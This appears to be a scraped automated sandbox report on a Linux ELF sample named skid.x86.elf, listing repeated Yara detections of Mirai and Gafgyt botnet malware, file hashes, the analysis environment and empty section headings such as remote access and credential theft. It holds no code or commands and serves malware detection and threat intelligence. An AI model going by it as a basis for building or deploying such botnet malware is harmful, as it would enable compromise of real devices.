Source: Yara match	File source: skid.x86.elf, type: SAMPLE
Source: Yara match	File source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY

Yara detected Mirai

Source: Yara match	File source: skid.x86.elf, type: SAMPLE
Source: Yara match	File source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY

Remote Access Functionality

Yara detected Gafgyt

Source: Yara match	File source: skid.x86.elf, type: SAMPLE
Source: Yara match	File source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY

Yara detected Mirai

Source: Yara match	File source: skid.x86.elf, type: SAMPLE
Source: Yara match	File source: 5434.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 5437.1.0000000000400000.000000000041e000.r-x.sdmp, type: MEMORY

ID:	1427746
Product:	CloudBasic
Start time:	03:51:09
Start date:	18.04.2024
Sample:	skid.x86.elf
Cookbook:	defaultlinuxfilecookbook.jbs
System description:	Ubuntu Linux 20.04 x64 (Kernel 5.4.0-72, Firefox 91.0, Evince Document Viewer 3.36.10, LibreOffice 6.4.7.2, OpenJDK 11.0.11)
Architecture:	LINUX
MD5:	2ee9003241bf69886f48e653f483cc7f
SHA1:	f17c5945e28d2c48f741e8f896dd57e6ac816f9d
SHA256:	9147282b77d7164a7e41fba802f3f6d1d4a73c435f25a4827d7f61ceb2d658dc
Filetype:	ELF Executable and Linkable format (generic) (4004/1) 100.00%

Linux Analysis Report skid.x86.elf

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Network Map

Contacted Public IPs

Contacted Domains

Linux Analysis Report
skid.x86.elf

Malware Threat Intel
Provided by